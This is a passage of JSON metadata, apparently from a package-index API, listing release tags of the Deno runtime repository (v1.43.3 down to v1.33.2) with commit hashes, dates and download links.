osts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v